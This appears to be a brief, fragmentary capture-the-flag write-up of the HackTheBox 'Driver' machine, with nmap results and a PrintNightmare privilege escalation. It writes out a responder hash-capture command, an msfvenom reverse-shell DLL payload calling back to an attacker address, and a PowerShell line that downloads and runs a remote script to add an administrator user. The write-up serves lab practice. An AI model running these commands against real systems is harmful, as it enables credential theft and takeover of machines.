HackTheBox-Driver

NMAP

PORT    STATE SERVICE      REASON          VERSION    
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

PORT 139/445 (SMB)

PORT 80 (HTTP)

responder -I tun0 -rdw -v

Privilege Escalation (Print Nightmare Python)

Assuming from the web page that there’s a print spooler service running , we can test if we can exploit PrintNightmare , now this requires some setup as we need to clone the specific impacket repo

msfvenom  x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.125 LPORT=2222 -f dll -o /var/smb/shell.dll

Print Nightmare (Powershell)

We can achieve SYSTEM on this machine through powershell as well , without the need of setting up a smb server

IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.120/nightmare.ps1');
Invoke-Nightmare -NewUser "USER" -NewPassword "PASS"

References

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store